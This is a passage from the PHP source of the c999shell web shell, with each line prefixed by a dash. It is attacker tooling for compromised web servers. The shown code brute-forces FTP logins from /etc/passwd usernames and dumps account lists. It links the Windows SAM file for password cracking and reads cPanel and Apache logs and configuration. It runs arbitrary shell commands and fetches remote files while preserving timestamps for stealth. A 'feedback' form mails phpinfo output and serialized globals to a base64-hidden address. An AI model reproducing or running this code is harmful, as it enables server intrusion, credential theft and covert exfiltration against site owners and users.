- $fp = fopen("/etc/passwd","r");
- if (!$fp) {echo "Can't get /etc/passwd for password-list.";}
- else
- {
- if ($fqb_logging)
- {
- if ($fqb_logfile) {$fqb_logfp = fopen($fqb_logfile,"w");}
- else {$fqb_logfp = FALSE;}
- $fqb_log = "FTP Quick Brute (called c999shell v. ".$shver.") started at ".date("d.m.Y H:i:s")."\r\n\r\n";
- if ($fqb_logfile) {fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));}
- }
- ob_flush();
- $i = $success = 0;
- $ftpquick_st = getmicrotime();
- while(!feof($fp))
- {
- $str = explode(":",fgets($fp,2048));
- if (c999ftpbrutecheck("localhost",21,1,$str[0],$str[0],$str[6],$fqb_onlywithsh))
- {
- echo "<b>Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\"</b><br>";
- $fqb_log .= "Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\", at ".date("d.m.Y H:i:s")."\r\n";
- if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));}
- $success++;
- ob_flush();
- }
- if ($i > $fqb_lenght) {break;}
- $i++;
- }
- if ($success == 0) {echo "No success. connections!"; $fqb_log .= "No success. connections!\r\n";}
- $ftpquick_t = round(getmicrotime()-$ftpquick_st,4);
- echo "<hr size=\"1\" noshade><b>Done!</b><br>Total time (secs.): ".$ftpquick_t."<br>Total connections: ".$i."<br>Success.: <font color=green><b>".$success."</b></font><br>Unsuccess.:".($i-$success)."</b><br>Connects per second: ".round($i/$ftpquick_t,2)."<br>";
- $fqb_log .= "\r\n------------------------------------------\r\nDone!\r\nTotal time (secs.): ".$ftpquick_t."\r\nTotal connections: ".$i."\r\nSuccess.: ".$success."\r\nUnsuccess.:".($i-$success)."\r\nConnects per second: ".round($i/$ftpquick_t,2)."\r\n";
- if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));}
- if ($fqb_logemail) {@mail($fqb_logemail,"c999shell v. ".$shver." report",$fqb_log);}
- fclose($fqb_logfp);
- }
- }
- else
- {
- $logfile = $tmpdir_logs."c999sh_ftpquickbrute_".date("d.m.Y_H_i_s").".log";
- $logfile = str_replace("//",DIRECTORY_SEPARATOR,$logfile);
- echo "<form action=\"".$surl."\"><input type=hidden name=act value=\"ftpquickbrute\"><br>Read first: <input type=text name=\"fqb_lenght\" value=\"".$nixpwdperpage."\"><br><br>Users only with shell? <input type=\"checkbox\" name=\"fqb_onlywithsh\" value=\"1\"><br><br>Logging? <input type=\"checkbox\" name=\"fqb_logging\" value=\"1\" checked><br>Logging to file? <input type=\"text\" name=\"fqb_logfile\" value=\"".$logfile."\" size=\"".(strlen($logfile)+2*(strlen($logfile)/10))."\"><br>Logging to e-mail? <input type=\"text\" name=\"fqb_logemail\" value=\"".$log_email."\" size=\"".(strlen($logemail)+2*(strlen($logemail)/10))."\"><br><br><input type=submit name=submit value=\"Brute\"></form>";
- }
- }
- }
- if ($act == "d")
- {
- if (!is_dir($d)) {echo "<center><b>Permision denied!</b></center>";}
- else
- {
- echo "<b>Directory information:</b><table border=0 cellspacing=1 cellpadding=2>";
- if (!$win)
- {
- echo "<tr><td><b>Owner/Group</b></td><td> ";
- $ow = posix_getpwuid(fileowner($d));
- $gr = posix_getgrgid(filegroup($d));
- $row[] = ($ow["name"]?$ow["name"]:fileowner($d))."/".($gr["name"]?$gr["name"]:filegroup($d));
- }
- echo "<tr><td><b>Perms</b></td><td><a href=\"".$surl."act=chmod&d=".urlencode($d)."\"><b>".view_perms_color($d)."</b></a><tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d))."</td></tr><tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d))."</td></tr><tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d))."</td></tr></table><br>";
- }
- }
- if ($act == "phpinfo") {@ob_clean(); phpinfo(); c999shexit();}
- if ($act == "security")
- {
- echo "<center><b>Server security information:</b></center><b>Open base dir: ".$hopenbasedir."</b><br>";
- if (!$win)
- {
- if ($nixpasswd)
- {
- if ($nixpasswd == 1) {$nixpasswd = 0;}
- echo "<b>*nix /etc/passwd:</b><br>";
- if (!is_numeric($nixpwd_s)) {$nixpwd_s = 0;}
- if (!is_numeric($nixpwd_e)) {$nixpwd_e = $nixpwdperpage;}
- echo "<form action=\"".$surl."\"><input type=hidden name=act value=\"security\"><input type=hidden name=\"nixpasswd\" value=\"1\"><b>From:</b> <input type=\"text=\" name=\"nixpwd_s\" value=\"".$nixpwd_s."\"> <b>To:</b> <input type=\"text\" name=\"nixpwd_e\" value=\"".$nixpwd_e."\"> <input type=submit value=\"View\"></form><br>";
- $i = $nixpwd_s;
- while ($i < $nixpwd_e)
- {
- $uid = posix_getpwuid($i);
- if ($uid)
- {
- $uid["dir"] = "<a href=\"".$surl."act=ls&d=".urlencode($uid["dir"])."\">".$uid["dir"]."</a>";
- echo join(":",$uid)."<br>";
- }
- $i++;
- }
- }
- else {echo "<br><a href=\"".$surl."act=security&nixpasswd=1&d=".$ud."\"><b><u>Get /etc/passwd</u></b></a><br>";}
- }
- else
- {
- $v = $_SERVER["WINDIR"]."\repair\sam";
- if (file_get_contents($v)) {echo "<b><font color=red>You can't crack winnt passwords(".$v.") </font></b><br>";}
- else {echo "<b><font color=green>You can crack winnt passwords. <a href=\"".$surl."act=f&f=sam&d=".$_SERVER["WINDIR"]."\\repair&ft=download\"><u><b>Download</b></u></a>, and use lcp.crack+</font></b><br>";}
- }
- if (file_get_contents("/etc/userdomains")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=userdomains&d=".urlencode("/etc")."&ft=txt\"><u><b>View cpanel user-domains logs</b></u></a></font></b><br>";}
- if (file_get_contents("/var/cpanel/accounting.log")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=accounting.log&d=".urlencode("/var/cpanel/")."\"&ft=txt><u><b>View cpanel logs</b></u></a></font></b><br>";}
- if (file_get_contents("/usr/local/apache/conf/httpd.conf")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=httpd.conf&d=".urlencode("/usr/local/apache/conf")."&ft=txt\"><u><b>Apache configuration (httpd.conf)</b></u></a></font></b><br>";}
- if (file_get_contents("/etc/httpd.conf")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=httpd.conf&d=".urlencode("/etc")."&ft=txt\"><u><b>Apache configuration (httpd.conf)</b></u></a></font></b><br>";}
- if (file_get_contents("/etc/syslog.conf")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=syslog.conf&d=".urlencode("/etc")."&ft=txt\"><u><b>Syslog configuration (syslog.conf)</b></u></a></font></b><br>";}
- if (file_get_contents("/etc/motd")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=motd&d=".urlencode("/etc")."&ft=txt\"><u><b>Message Of The Day</b></u></a></font></b><br>";}
- if (file_get_contents("/etc/hosts")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=hosts&d=".urlencode("/etc")."&ft=txt\"><u><b>Hosts</b></u></a></font></b><br>";}
- function displaysecinfo($name,$value) {if (!empty($value)) {if (!empty($name)) {$name = "<b>".$name." - </b>";} echo $name.nl2br($value)."<br>";}}
- displaysecinfo("OS Version?",myshellexec("cat /proc/version"));
- displaysecinfo("Kernel version?",myshellexec("sysctl -a | grep version"));
- displaysecinfo("Distrib name",myshellexec("cat /etc/issue.net"));
- displaysecinfo("Distrib name (2)",myshellexec("cat /etc/*-realise"));
- displaysecinfo("CPU?",myshellexec("cat /proc/cpuinfo"));
- displaysecinfo("RAM",myshellexec("free -m"));
- displaysecinfo("HDD space",myshellexec("df -h"));
- displaysecinfo("List of Attributes",myshellexec("lsattr -a"));
- displaysecinfo("Mount options ",myshellexec("cat /etc/fstab"));
- displaysecinfo("Is cURL installed?",myshellexec("which curl"));
- displaysecinfo("Is lynx installed?",myshellexec("which lynx"));
- displaysecinfo("Is links installed?",myshellexec("which links"));
- displaysecinfo("Is fetch installed?",myshellexec("which fetch"));
- displaysecinfo("Is GET installed?",myshellexec("which GET"));
- displaysecinfo("Is perl installed?",myshellexec("which perl"));
- displaysecinfo("Where is apache",myshellexec("whereis apache"));
- displaysecinfo("Where is perl?",myshellexec("whereis perl"));
- displaysecinfo("locate proftpd.conf",myshellexec("locate proftpd.conf"));
- displaysecinfo("locate httpd.conf",myshellexec("locate httpd.conf"));
- displaysecinfo("locate my.conf",myshellexec("locate my.conf"));
- displaysecinfo("locate psybnc.conf",myshellexec("locate psybnc.conf"));
- }
- if ($act == "mkfile")
- {
- if ($mkfile != $d)
- {
- if (file_exists($mkfile)) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: object alredy exists";}
- elseif (!fopen($mkfile,"w")) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: access denied";}
- else {$act = "f"; $d = dirname($mkfile); if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} $f = basename($mkfile);}
- }
- else {$act = $dspact = "ls";}
- }
- if ($act == "encoder")
- {
- echo "<script>function set_encoder_input(text) {document.forms.encoder.input.value = text;}</script><center><b>Encoder:</b></center><form name=\"encoder\" action=\"".$surl."\" method=POST><input type=hidden name=act value=encoder><b>Input:</b><center><textarea name=\"encoder_input\" id=\"input\" cols=50 rows=5>".@htmlspecialchars($encoder_input)."</textarea><br><br><input type=submit value=\"calculate\"><br><br></center><b>Hashes</b>:<br><center>";
- foreach(array("md5","crypt","sha1","crc32") as $v)
- {
- echo $v." - <input type=text size=50 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".$v($encoder_input)."\" readonly><br>";
- }
- echo "</center><b>Url:</b><center><br>urlencode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".urlencode($encoder_input)."\" readonly>
- <br>urldecode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".htmlspecialchars(urldecode($encoder_input))."\" readonly>
- <br></center><b>Base64:</b><center>base64_encode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".base64_encode($encoder_input)."\" readonly></center>";
- echo "<center>base64_decode - ";
- if (base64_encode(base64_decode($encoder_input)) != $encoder_input) {echo "<input type=text size=35 value=\"failed\" disabled readonly>";}
- else
- {
- $debase64 = base64_decode($encoder_input);
- $debase64 = str_replace("\0","[0]",$debase64);
- $a = explode("\r\n",$debase64);
- $rows = count($a);
- $debase64 = htmlspecialchars($debase64);
- if ($rows == 1) {echo "<input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".$debase64."\" id=\"debase64\" readonly>";}
- else {$rows++; echo "<textarea cols=\"40\" rows=\"".$rows."\" onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" id=\"debase64\" readonly>".$debase64."</textarea>";}
- echo " <a href=\"#\" onclick=\"set_encoder_input(document.forms.encoder.debase64.value)\"><b>^</b></a>";
- }
- echo "</center><br><b>Base convertations</b>:<center>dec2hex - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"";
- $c = strlen($encoder_input);
- for($i=0;$i<$c;$i++)
- {
- $hex = dechex(ord($encoder_input[$i]));
- if ($encoder_input[$i] == "&") {echo $encoder_input[$i];}
- elseif ($encoder_input[$i] != "\\") {echo "%".$hex;}
- }
- echo "\" readonly><br></center></form>";
- }
- if ($act == "fsbuff")
- {
- $arr_copy = $sess_data["copy"];
- $arr_cut = $sess_data["cut"];
- $arr = array_merge($arr_copy,$arr_cut);
- if (count($arr) == 0) {echo "<center><b>Buffer is empty!</b></center>";}
- else {echo "<b>File-System buffer</b><br><br>"; $ls_arr = $arr; $disp_fullpath = TRUE; $act = "ls";}
- }
- if ($act == "selfremove")
- {
- if (($submit == $rndcode) and ($submit != ""))
- {
- if (unlink(__FILE__)) {@ob_clean(); echo "Thanks for using c999shell v.".$shver."!"; c999shexit(); }
- else {echo "<center><b>Can't delete ".__FILE__."!</b></center>";}
- }
- else
- {
- if (!empty($rndcode)) {echo "<b>Error: incorrect confimation!</b>";}
- $rnd = rand(0,9).rand(0,9).rand(0,9);
- echo "<form action=\"".$surl."\"><input type=hidden name=act value=selfremove><b>Self-remove: ".__FILE__." <br><b>Are you sure?<br>For confirmation, enter \"".$rnd."\"</b>: <input type=hidden name=rndcode value=\"".$rnd."\"><input type=text name=submit> <input type=submit value=\"YES\"></form>";
- }
- }
- if ($act == "update") {$ret = c999sh_getupdate(!!$confirmupdate); echo "<b>".$ret."</b>"; if (stristr($ret,"new version")) {echo "<br><br><input type=button onclick=\"location.href='".$surl."act=update&confirmupdate=1';\" value=\"Update now\">";}}
- if ($act == "feedback")
- {
- $suppmail = base64_decode("ZGV2QGJsYWRlODMuZGU=");
- if (!empty($submit))
- {
- $ticket = substr(md5(microtime()+rand(1,1000)),0,6);
- $body = "c999shell v.".$shver." feedback #".$ticket."\nName: ".htmlspecialchars($fdbk_name)."\nE-mail: ".htmlspecialchars($fdbk_email)."\nMessage:\n".htmlspecialchars($fdbk_body)."\n\nIP: ".$REMOTE_ADDR;
- if (!empty($fdbk_ref))
- {
- $tmp = @ob_get_contents();
- ob_clean();
- phpinfo();
- $phpinfo = base64_encode(ob_get_contents());
- ob_clean();
- echo $tmp;
- $body .= "\n"."phpinfo(): ".$phpinfo."\n"."\$GLOBALS=".base64_encode(serialize($GLOBALS))."\n";
- }
- mail($suppmail,"c999shell v.".$shver." feedback #".$ticket,$body,"FROM: ".$suppmail);
- echo "<center><b>Thanks for your feedback! Your ticket ID: ".$ticket.".</b></center>";
- }
- else {echo "<form action=\"".$surl."\" method=POST><input type=hidden name=act value=feedback><b>Feedback or report bug (".str_replace(array("@","."),array("[at]","[dot]"),$suppmail)."):<br><br>Your name: <input type=\"text\" name=\"fdbk_name\" value=\"".htmlspecialchars($fdbk_name)."\"><br><br>Your e-mail: <input type=\"text\" name=\"fdbk_email\" value=\"".htmlspecialchars($fdbk_email)."\"><br><br>Message:<br><textarea name=\"fdbk_body\" cols=80 rows=10>".htmlspecialchars($fdbk_body)."</textarea><input type=\"hidden\" name=\"fdbk_ref\" value=\"".urlencode($HTTP_REFERER)."\"><br><br>Attach server-info * <input type=\"checkbox\" name=\"fdbk_servinf\" value=\"1\" checked><br><br>There are no checking in the form.<br><br>* - strongly recommended, if you report bug, because we need it for bug-fix.<br><br>We understand languages: English, Deutsch.<br><br><input type=\"submit\" name=\"submit\" value=\"Send\"></form>";}
- }
- if ($act == "search")
- {
- echo "<b>Search in file-system:</b><br>";
- if (empty($search_in)) {$search_in = $d;}
- if (empty($search_name)) {$search_name = "(.*)"; $search_name_regexp = 1;}
- if (empty($search_text_wwo)) {$search_text_regexp = 0;}
- if (!empty($submit))
- {
- $found = array();
- $found_d = 0;
- $found_f = 0;
- $search_i_f = 0;
- $search_i_d = 0;
- $a = array
- (
- "name"=>$search_name, "name_regexp"=>$search_name_regexp,
- "text"=>$search_text, "text_regexp"=>$search_text_regxp,
- "text_wwo"=>$search_text_wwo,
- "text_cs"=>$search_text_cs,
- "text_not"=>$search_text_not
- );
- $searchtime = getmicrotime();
- $in = array_unique(explode(";",$search_in));
- foreach($in as $v) {c999fsearch($v);}
- $searchtime = round(getmicrotime()-$searchtime,4);
- if (count($found) == 0) {echo "<b>No files found!</b>";}
- else
- {
- $ls_arr = $found;
- $disp_fullpath = TRUE;
- $act = "ls";
- }
- }
- echo "<form method=POST>
- <input type=hidden name=\"d\" value=\"".$dispd."\"><input type=hidden name=act value=\"".$dspact."\">
- <b>Search for (file/folder name): </b><input type=\"text\" name=\"search_name\" size=\"".round(strlen($search_name)+25)."\" value=\"".htmlspecialchars($search_name)."\"> <input type=\"checkbox\" name=\"search_name_regexp\" value=\"1\" ".($search_name_regexp == 1?" checked":"")."> - regexp
- <br><b>Search in (explode \";\"): </b><input type=\"text\" name=\"search_in\" size=\"".round(strlen($search_in)+25)."\" value=\"".htmlspecialchars($search_in)."\">
- <br><br><b>Text:</b><br><textarea name=\"search_text\" cols=\"122\" rows=\"10\">".htmlspecialchars($search_text)."</textarea>
- <br><br><input type=\"checkbox\" name=\"search_text_regexp\" value=\"1\" ".($search_text_regexp == 1?" checked":"")."> - regexp
- <input type=\"checkbox\" name=\"search_text_wwo\" value=\"1\" ".($search_text_wwo == 1?" checked":"")."> - <u>w</u>hole words only
- <input type=\"checkbox\" name=\"search_text_cs\" value=\"1\" ".($search_text_cs == 1?" checked":"")."> - cas<u>e</u> sensitive
- <input type=\"checkbox\" name=\"search_text_not\" value=\"1\" ".($search_text_not == 1?" checked":"")."> - find files <u>NOT</u> containing the text
- <br><br><input type=submit name=submit value=\"Search\"></form>";
- if ($act == "ls") {$dspact = $act; echo "<hr size=\"1\" noshade><b>Search took ".$searchtime." secs (".$search_i_f." files and ".$search_i_d." folders, ".round(($search_i_f+$search_i_d)/$searchtime,4)." objects per second).</b><br><br>";}
- }
- if ($act == "chmod")
- {
- $mode = fileperms($d.$f);
- if (!$mode) {echo "<b>Change file-mode with error:</b> can't get current value.";}
- else
- {
- $form = TRUE;
- if ($chmod_submit)
- {
- $octet = "0".base_convert(($chmod_o["r"]?1:0).($chmod_o["w"]?1:0).($chmod_o["x"]?1:0).($chmod_g["r"]?1:0).($chmod_g["w"]?1:0).($chmod_g["x"]?1:0).($chmod_w["r"]?1:0).($chmod_w["w"]?1:0).($chmod_w["x"]?1:0),2,8);
- if (chmod($d.$f,$octet)) {$act = "ls"; $form = FALSE; $err = "";}
- else {$err = "Can't chmod to ".$octet.".";}
- }
- if ($form)
- {
- $perms = parse_perms($mode);
- echo "<b>Changing file-mode (".$d.$f."), ".view_perms_color($d.$f)." (".substr(decoct(fileperms($d.$f)),-4,4).")</b><br>".($err?"<b>Error:</b> ".$err:"")."<form action=\"".$surl."\" method=POST><input type=hidden name=d value=\"".htmlspecialchars($d)."\"><input type=hidden name=f value=\"".htmlspecialchars($f)."\"><input type=hidden name=act value=chmod><table align=left width=300 border=0 cellspacing=0 cellpadding=5><tr><td><b>Owner</b><br><br><input type=checkbox NAME=chmod_o[r] value=1".($perms["o"]["r"]?" checked":"")."> Read<br><input type=checkbox name=chmod_o[w] value=1".($perms["o"]["w"]?" checked":"")."> Write<br><input type=checkbox NAME=chmod_o[x] value=1".($perms["o"]["x"]?" checked":"").">eXecute</td><td><b>Group</b><br><br><input type=checkbox NAME=chmod_g[r] value=1".($perms["g"]["r"]?" checked":"")."> Read<br><input type=checkbox NAME=chmod_g[w] value=1".($perms["g"]["w"]?" checked":"")."> Write<br><input type=checkbox NAME=chmod_g[x] value=1".($perms["g"]["x"]?" checked":"").">eXecute</font></td><td><b>World</b><br><br><input type=checkbox NAME=chmod_w[r] value=1".($perms["w"]["r"]?" checked":"")."> Read<br><input type=checkbox NAME=chmod_w[w] value=1".($perms["w"]["w"]?" checked":"")."> Write<br><input type=checkbox NAME=chmod_w[x] value=1".($perms["w"]["x"]?" checked":"").">eXecute</font></td></tr><tr><td><input type=submit name=chmod_submit value=\"Save\"></td></tr></table></form>";
- }
- }
- }
- if ($act == "upload")
- {
- $uploadmess = "";
- $uploadpath = str_replace("\\",DIRECTORY_SEPARATOR,$uploadpath);
- if (empty($uploadpath)) {$uploadpath = $d;}
- elseif (substr($uploadpath,-1) != "/") {$uploadpath .= "/";}
- if (!empty($submit))
- {
- global $HTTP_POST_FILES;
- $uploadfile = $HTTP_POST_FILES["uploadfile"];
- if (!empty($uploadfile["tmp_name"]))
- {
- if (empty($uploadfilename)) {$destin = $uploadfile["name"];}
- else {$destin = $userfilename;}
- if (!move_uploaded_file($uploadfile["tmp_name"],$uploadpath.$destin)) {$uploadmess .= "Error uploading file ".$uploadfile["name"]." (can't copy \"".$uploadfile["tmp_name"]."\" to \"".$uploadpath.$destin."\"!<br>";}
- }
- elseif (!empty($uploadurl))
- {
- if (!empty($uploadfilename)) {$destin = $uploadfilename;}
- else
- {
- $destin = explode("/",$destin);
- $destin = $destin[count($destin)-1];
- if (empty($destin))
- {
- $i = 0;
- $b = "";
- while(file_exists($uploadpath.$destin)) {if ($i > 0) {$b = "_".$i;} $destin = "index".$b.".html"; $i++;}}
- }
- if ((!eregi("http://",$uploadurl)) and (!eregi("https://",$uploadurl)) and (!eregi("ftp://",$uploadurl))) {echo "<b>Incorect url!</b><br>";}
- else
- {
- $st = getmicrotime();
- $content = @file_get_contents($uploadurl);
- $dt = round(getmicrotime()-$st,4);
- if (!$content) {$uploadmess .= "Can't download file!<br>";}
- else
- {
- if ($filestealth) {$stat = stat($uploadpath.$destin);}
- $fp = fopen($uploadpath.$destin,"w");
- if (!$fp) {$uploadmess .= "Error writing to file ".htmlspecialchars($destin)."!<br>";}
- else
- {
- fwrite($fp,$content,strlen($content));
- fclose($fp);
- if ($filestealth) {touch($uploadpath.$destin,$stat[9],$stat[8]);}
- }
- }
- }
- }
- }
- if ($miniform)
- {
- echo "<b>".$uploadmess."</b>";
- $act = "ls";
- }
- else
- {
- echo "<b>File upload:</b><br><b>".$uploadmess."</b><form enctype=\"multipart/form-data\" action=\"".$surl."act=upload&d=".urlencode($d)."\" method=POST>
- Select file on your local computer: <input name=\"uploadfile\" type=\"file\"><br> or<br>
- Input URL: <input name=\"uploadurl\" type=\"text\" value=\"".htmlspecialchars($uploadurl)."\" size=\"70\"><br><br>
- Save this file dir: <input name=\"uploadpath\" size=\"70\" value=\"".$dispd."\"><br><br>
- File-name (auto-fill): <input name=uploadfilename size=25><br><br>
- <input type=checkbox name=uploadautoname value=1 id=df4> convert file name to lovercase<br><br>
- <input type=submit name=submit value=\"Upload\">
- </form>";
- }
- }
- if ($act == "delete")
- {
- $delerr = "";
- foreach ($actbox as $v)
- {
- $result = FALSE;
- $result = fs_rmobj($v);
- if (!$result) {$delerr .= "Can't delete ".htmlspecialchars($v)."<br>";}
- }
- if (!empty($delerr)) {echo "<b>Deleting with errors:</b><br>".$delerr;}
- $act = "ls";
- }
- if (!$usefsbuff)
- {
- if (($act == "paste") or ($act == "copy") or ($act == "cut") or ($act == "unselect")) {echo "<center><b>Sorry, buffer is disabled. For enable, set directive \"\$useFSbuff\" as TRUE.</center>";}
- }
- else
- {
- if ($act == "copy") {$err = ""; $sess_data["copy"] = array_merge($sess_data["copy"],$actbox); c999_sess_put($sess_data); $act = "ls"; }
- elseif ($act == "cut") {$sess_data["cut"] = array_merge($sess_data["cut"],$actbox); c999_sess_put($sess_data); $act = "ls";}
- elseif ($act == "unselect") {foreach ($sess_data["copy"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["copy"][$k]);}} foreach ($sess_data["cut"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["cut"][$k]);}} c999_sess_put($sess_data); $act = "ls";}
- if ($actemptybuff) {$sess_data["copy"] = $sess_data["cut"] = array(); c999_sess_put($sess_data);}
- elseif ($actpastebuff)
- {
- $psterr = "";
- foreach($sess_data["copy"] as $k=>$v)
- {
- $to = $d.basename($v);
- if (!fs_copy_obj($v,$to)) {$psterr .= "Can't copy ".$v." to ".$to."!<br>";}
- if ($copy_unset) {unset($sess_data["copy"][$k]);}
- }
- foreach($sess_data["cut"] as $k=>$v)
- {
- $to = $d.basename($v);
- if (!fs_move_obj($v,$to)) {$psterr .= "Can't move ".$v." to ".$to."!<br>";}
- unset($sess_data["cut"][$k]);
- }
- c999_sess_put($sess_data);
- if (!empty($psterr)) {echo "<b>Pasting with errors:</b><br>".$psterr;}
- $act = "ls";
- }
- elseif ($actarcbuff)
- {
- $arcerr = "";
- if (substr($actarcbuff_path,-7,7) == ".tar.gz") {$ext = ".tar.gz";}
- else {$ext = ".tar.gz";}
- if ($ext == ".tar.gz") {$cmdline = "tar cfzv";}
- $cmdline .= " ".$actarcbuff_path;
- $objects = array_merge($sess_data["copy"],$sess_data["cut"]);
- foreach($objects as $v)
- {
- $v = str_replace("\\",DIRECTORY_SEPARATOR,$v);
- if (substr($v,0,strlen($d)) == $d) {$v = basename($v);}
- if (is_dir($v))
- {
- if (substr($v,-1) != DIRECTORY_SEPARATOR) {$v .= DIRECTORY_SEPARATOR;}
- $v .= "*";
- }
- $cmdline .= " ".$v;
- }
- $tmp = realpath(".");
- chdir($d);
- $ret = myshellexec($cmdline);
- chdir($tmp);
- if (empty($ret)) {$arcerr .= "Can't call archivator (".htmlspecialchars(str2mini($cmdline,60)).")!<br>";}
- $ret = str_replace("\r\n","\n",$ret);
- $ret = explode("\n",$ret);
- if ($copy_unset) {foreach($sess_data["copy"] as $k=>$v) {unset($sess_data["copy"][$k]);}}
- foreach($sess_data["cut"] as $k=>$v)
- {
- if (in_array($v,$ret)) {fs_rmobj($v);}
- unset($sess_data["cut"][$k]);
- }
- c999_sess_put($sess_data);
- if (!empty($arcerr)) {echo "<b>Archivation errors:</b><br>".$arcerr;}
- $act = "ls";
- }
- elseif ($actpastebuff)
- {
- $psterr = "";
- foreach($sess_data["copy"] as $k=>$v)
- {
- $to = $d.basename($v);
- if (!fs_copy_obj($v,$d)) {$psterr .= "Can't copy ".$v." to ".$to."!<br>";}
- if ($copy_unset) {unset($sess_data["copy"][$k]);}
- }
- foreach($sess_data["cut"] as $k=>$v)
- {
- $to = $d.basename($v);
- if (!fs_move_obj($v,$d)) {$psterr .= "Can't move ".$v." to ".$to."!<br>";}
- unset($sess_data["cut"][$k]);
- }
- c999_sess_put($sess_data);
- if (!empty($psterr)) {echo "<b>Pasting with errors:</b><br>".$psterr;}
- $act = "ls";
- }
- }
- if ($act == "cmd")
- {
- if (trim($cmd) == "ps -aux") {$act = "processes";}
- elseif (trim($cmd) == "tasklist") {$act = "processes";}
- else
- {
- @chdir($chdir);
- if (!empty($submit))
- {
- echo "<b>Result of execution this command</b>:<br>";
- $olddir = realpath(".");
- @chdir($d);
- $ret = myshellexec($cmd);
- $ret = convert_cyr_string($ret,"d","w");
- if ($cmd_txt)
- {
- $rows = count(explode("\r\n",$ret))+1;
- if ($rows < 10) {$rows = 10;}
- echo "<br><textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>";
- }
- else {echo $ret."<br>";}
- @chdir($olddir);
- }
- else {echo "<b>Execution command</b>"; if (empty($cmd_txt)) {$cmd_txt = TRUE;}}
- echo "<form action=\"".$surl."\" method=POST><input type=hidden name=act value=cmd><textarea name=cmd cols=122 rows=10>".htmlspecialchars($cmd)."</textarea><input type=hidden name=\"d\" value=\"".$dispd."\"><br><br><input type=submit name=submit value=\"Execute\"> Display in text-area <input type=\"checkbox\" name=\"cmd_txt\" value=\"1\""; if ($cmd_txt) {echo " checked";} echo "></form>";
- }
- }
- if ($act == "ls")
- {
- if (count($ls_arr) > 0) {$list = $ls_arr;}
- else
- {
- $list = array();
- if ($h = @opendir($d))
- {
- while (($o = readdir($h)) !== FALSE) {$list[] = $d.$o;}
- closedir($h);
- }
- else {}
- }
- if (count($list) == 0) {echo "<center><b>Can't open folder (".htmlspecialchars($d).")!</b></center>";}
- else
- {
- //Building array
- $objects = array();
- $vd = "f"; //Viewing mode
- if ($vd == "f")
- {
- $objects["head"] = array();
- $objects["folders"] = array();
- $objects["links"] = array();
- $objects["files"] = array();
- foreach ($list as $v)
- {
- $o = basename($v);
- $row = array();
- if ($o == ".") {$row[] = $d.$o; $row[] = "LINK";}
- elseif ($o == "..") {$row[] = $d.$o; $row[] = "LINK";}
- elseif (is_dir($v))
- {
- if (is_link($v)) {$type = "LINK";}
- else {$type = "DIR";}
- $row[] = $v;
- $row[] = $type;
- }
- elseif(is_file($v)) {$row[] = $v; $row[] = filesize($v);}
- $row[] = filemtime($v);
- if (!$win)
- {
- $ow = posix_getpwuid(fileowner($v));
- $gr = posix_getgrgid(filegroup($v));
- $row[] = ($ow["name"]?$ow["name"]:fileowner($v))."/".($gr["name"]?$gr["name"]:filegroup($v));
- }
- $row[] = fileperms($v);
- if (($o == ".") or ($o == "..")) {$objects["head"][] = $row;}
- elseif (is_link($v)) {$objects["links"][] = $row;}
- elseif (is_dir($v)) {$objects["folders"][] = $row;}
- elseif (is_file($v)) {$objects["files"][] = $row;}
- $i++;
- }
- $row = array();
- $row[] = "<b>Name</b>";
- $row[] = "<b>Size</b>";
- $row[] = "<b>Modify</b>";
- if (!$win)
- {$row[] = "<b>Owner/Group</b>";}
- $row[] = "<b>Perms</b>";
- $row[] = "<b>Action</b>";
- $parsesort = parsesort($sort);
- $sort = $parsesort[0].$parsesort[1];
- $k = $parsesort[0];
- if ($parsesort[1] != "a") {$parsesort[1] = "d";}
- $y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&sort=".$k.($parsesort[1] == "a"?"d":"a")."\">";
- $y .= "<img src=\"".$surl."act=img&img=sort_".($sort[1] == "a"?"asc":"desc")."\" height=\"9\" width=\"14\" alt=\"".($parsesort[1] == "a"?"Asc.":"Desc")."\" border=\"0\"></a>";
- $row[$k] .= $y;
- for($i=0;$i<count($row)-1;$i++)
- {
- if ($i != $k) {$row[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&sort=".$i.$parsesort[1]."\">".$row[$i]."</a>";}
- }
- $v = $parsesort[0];
- usort($objects["folders"], "tabsort");
- usort($objects["links"], "tabsort");
- usort($objects["files"], "tabsort");
- if ($parsesort[1] == "d")
- {
- $objects["folders"] = array_reverse($objects["folders"]);
- $objects["files"] = array_reverse($objects["files"]);
- }
